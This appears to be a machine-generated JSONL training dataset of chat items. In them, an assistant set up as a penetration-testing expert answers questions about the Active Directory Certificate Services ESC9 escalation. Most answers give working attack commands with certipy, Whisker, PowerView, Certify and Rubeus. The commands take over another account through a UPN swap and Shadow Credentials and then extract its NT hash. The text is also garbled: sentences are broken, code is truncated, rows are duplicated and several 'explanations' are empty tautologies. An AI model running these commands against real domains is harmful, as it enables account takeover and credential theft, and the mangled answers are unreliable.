\"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to user3.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3\n`\n\nThe vulnerable certificate can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -target \"$ADCS_HOST\" -ca 'ca_name' -templa"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Certificate templates - (ESC9) No security extension?", "response": "To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in this section.\n\nIf the certificate attribute msPKI-Enrollment-Flag contains the flag CT_FLAG_NO_SECURITY_EXTENSION, the szOID_NTDS_CA_SECURITY_EXT extension will not be embedded, meaning that even with StrongCertificateBindingEnforcement set to 1, the mapping will be performed similarly as a value of 0 in the registry key.\n\nHere are the requirements to perform ESC9:\n\n* StrongCertificateBindingEnforcement not set to 2 (default: 1) or CertificateMappingMethods contains UPN flag (0x4)\n* The template contains the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value\n* The template specifies client authentication\n* GenericWrite right against any account A to compromise any account B\n\n> [!WARNING]\n> Acate can then be used with to obtain a TGT and authenticat the time of writting (06/08/2022), there is no solution as a low privileged user to read the StrongCertificateBindingEnforcement or the CertificateMappingMethods values. It is worth to try the attack hopping the keys are misconfigured.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC9 scenario.\n\nIn this scenario, user1 has GenericWrite against user2 and wants to compromise user3. user2 is allowed to enroll in a vulnerable template that specifies the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to user3.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3\n`\n\nThe vulnerable certificate can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -target \"$ADCS_HOST\" -ca 'ca_name' -templa", "metadata": {"corpus_index": 71, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate templates - (ESC9) No security extension?"}, {"role": "assistant", "content": "To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in this section.\n\nIf the certificate attribute msPKI-Enrollment-Flag contains the flag CT_FLAG_NO_SECURITY_EXTENSION, the szOID_NTDS_CA_SECURITY_EXT extension will not be embedded, meaning that even with StrongCertificateBindingEnforcement set to 1, the mapping will be performed similarly as a value of 0 in the registry key.\n\nHere are the requirements to perform ESC9:\n\n* StrongCertificateBindingEnforcement not set to 2 (default: 1) or CertificateMappingMethods contains UPN flag (0x4)\n* The template contains the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value\n* The template specifies client authentication\n* GenericWrite right against any account A to compromise any account B\n\n> [!WARNING]\n> Acate can then be used with to obtain a TGT and authenticat the time of writting (06/08/2022), there is no solution as a low privileged user to read the StrongCertificateBindingEnforcement or the CertificateMappingMethods values. It is worth to try the attack hopping the keys are misconfigured.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC9 scenario.\n\nIn this scenario, user1 has GenericWrite against user2 and wants to compromise user3. user2 is allowed to enroll in a vulnerable template that specifies the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to user3.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3\n`\n\nThe vulnerable certificate can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -target \"$ADCS_HOST\" -ca 'ca_name' -templa"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate templates - (ESC9) No security extension?", "response": "To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in this section.\n\nIf the certificate attribute msPKI-Enrollment-Flag contains the flag CT_FLAG_NO_SECURITY_EXTENSION, the szOID_NTDS_CA_SECURITY_EXT extension will not be embedded, meaning that even with StrongCertificateBindingEnforcement set to 1, the mapping will be performed similarly as a value of 0 in the registry key.\n\nHere are the requirements to perform ESC9:\n\n* StrongCertificateBindingEnforcement not set to 2 (default: 1) or CertificateMappingMethods contains UPN flag (0x4)\n* The template contains the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value\n* The template specifies client authentication\n* GenericWrite right against any account A to compromise any account B\n\n> [!WARNING]\n> Acate can then be used with to obtain a TGT and authenticat the time of writting (06/08/2022), there is no solution as a low privileged user to read the StrongCertificateBindingEnforcement or the CertificateMappingMethods values. It is worth to try the attack hopping the keys are misconfigured.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC9 scenario.\n\nIn this scenario, user1 has GenericWrite against user2 and wants to compromise user3. user2 is allowed to enroll in a vulnerable template that specifies the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to user3.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3\n`\n\nThe vulnerable certificate can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -target \"$ADCS_HOST\" -ca 'ca_name' -templa", "metadata": {"corpus_index": 71, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use certipy for certificate templates - (esc9) no security extension?"}, {"role": "assistant", "content": "certipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use certipy for certificate templates - (esc9) no security extension?", "response": "certipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2", "metadata": {"corpus_index": 72, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate templates - (ESC9) No security extension"}, {"role": "assistant", "content": "certipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate templates - (ESC9) No security extension", "response": "certipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2", "metadata": {"corpus_index": 72, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc9) no security extension. (ESC9) No security extension"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2`?", "response": "This command is used for certificate templates - (esc9) no security extension. (ESC9) No security extension", "metadata": {"corpus_index": 72, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the certipy command for certificate templates - (esc9) no security extension"}, {"role": "assistant", "content": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the certipy command for certificate templates - (esc9) no security extension", "response": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3", "metadata": {"corpus_index": 73, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate templates - (ESC9) No security extension?"}, {"role": "assistant", "content": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate templates - (ESC9) No security extension?", "response": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3", "metadata": {"corpus_index": 73, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc9) no security extension. (ESC9) No security extension"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3`?", "response": "This command is used for certificate templates - (esc9) no security extension. (ESC9) No security extension", "metadata": {"corpus_index": 73, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the certipy syntax for certificate templates - (esc9) no security extension?"}, {"role": "assistant", "content": "certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the certipy syntax for certificate templates - (esc9) no security extension?", "response": "certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'", "metadata": {"corpus_index": 74, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate templates - (ESC9) No security extension?"}, {"role": "assistant", "content": "certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate templates - (ESC9) No security extension?", "response": "certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'", "metadata": {"corpus_index": 74, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc9) no security extension. (ESC9) No security extension"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'`?", "response": "This command is used for certificate templates - (esc9) no security extension. (ESC9) No security extension", "metadata": {"corpus_index": 74, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use certipy for certificate templates - (esc9) no security extension?"}, {"role": "assistant", "content": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use certipy for certificate templates - (esc9) no security extension?", "response": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"", "metadata": {"corpus_index": 75, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Certificate templates - (ESC9) No security extension"}, {"role": "assistant", "content": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Certificate templates - (ESC9) No security extension", "response": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"", "metadata": {"corpus_index": 75, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc9) no security extension. (ESC9) No security extension"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"`?", "response": "This command is used for certificate templates - (esc9) no security extension. (ESC9) No security extension", "metadata": {"corpus_index": 75, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the certipy command to certificate templates - (esc9) no security extension"}, {"role": "assistant", "content": "certipy auth -pfx 'user3.pfx' -domain \"$DOMAIN\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the certipy command to certificate templates - (esc9) no security extension", "response": "certipy auth -pfx 'user3.pfx' -domain \"$DOMAIN\"", "metadata": {"corpus_index": 76, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate templates - (ESC9) No security extension?"}, {"role": "assistant", "content": "certipy auth -pfx 'user3.pfx' -domain \"$DOMAIN\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate templates - (ESC9) No security extension?", "response": "certipy auth -pfx 'user3.pfx' -domain \"$DOMAIN\"", "metadata": {"corpus_index": 76, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy auth -pfx 'user3.pfx' -domain \"$DOMAIN\"`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc9) no security extension. (ESC9) No security extension"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy auth -pfx 'user3.pfx' -domain \"$DOMAIN\"`?", "response": "This command is used for certificate templates - (esc9) no security extension. (ESC9) No security extension", "metadata": {"corpus_index": 76, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise user3. user2 is allowed to enroll in a vulnerable template that specifies the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to user3 with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user3'} -Verbose\n`\n\nThe vulnerable certificate can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash during UnPac the hash. This action can be realised with Rubeus. The domain must be specified since it is not present in the certificate.\n\n`powershell\nRubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise user3. user2 is allowed to enroll in a vulnerable template that specifies the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to user3 with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user3'} -Verbose\n`\n\nThe vulnerable certificate can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash during UnPac the hash. This action can be realised with Rubeus. The domain must be specified since it is not present in the certificate.\n\n`powershell\nRubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::", "metadata": {"corpus_index": 77, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise user3. user2 is allowed to enroll in a vulnerable template that specifies the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to user3 with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user3'} -Verbose\n`\n\nThe vulnerable certificate can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash during UnPac the hash. This action can be realised with Rubeus. The domain must be specified since it is not present in the certificate.\n\n`powershell\nRubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise user3. user2 is allowed to enroll in a vulnerable template that specifies the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to user3 with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user3'} -Verbose\n`\n\nThe vulnerable certificate can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash during UnPac the hash. This action can be realised with Rubeus. The domain must be specified since it is not present in the certificate.\n\n`powershell\nRubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::", "metadata": {"corpus_index": 77, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "Here, user1 has `GenericWrite` against user2 and want to compromise user3. user2 is allowed to enroll in a vulnerable template that specifies the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value.\n\nFirst, the user2's credentials are needed. It can be retrieved via a [Shadow Credentials](../kerberos/shadow-credentials.md) attack, for example. Here just the `msDs-KeyCredentialLink` modification part with [Whisker](https://github.com/eladshamir/Whisker):"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "Here, user1 has `GenericWrite` against user2 and want to compromise user3. user2 is allowed to enroll in a vulnerable template that specifies the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value.\n\nFirst, the user2's credentials are needed. It can be retrieved via a [Shadow Credentials](../kerberos/shadow-credentials.md) attack, for example. Here just the `msDs-KeyCredentialLink` modification part with [Whisker](https://github.com/eladshamir/Whisker):", "metadata": {"corpus_index": 78, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Here, user1 has `GenericWrite` against user2 and want to compromise user3. user2 is allowed to enroll in a vulnerable template that specifies the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value.`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Here, user1 has `GenericWrite` against user2 and want to compromise user3. user2 is allowed to enroll in a 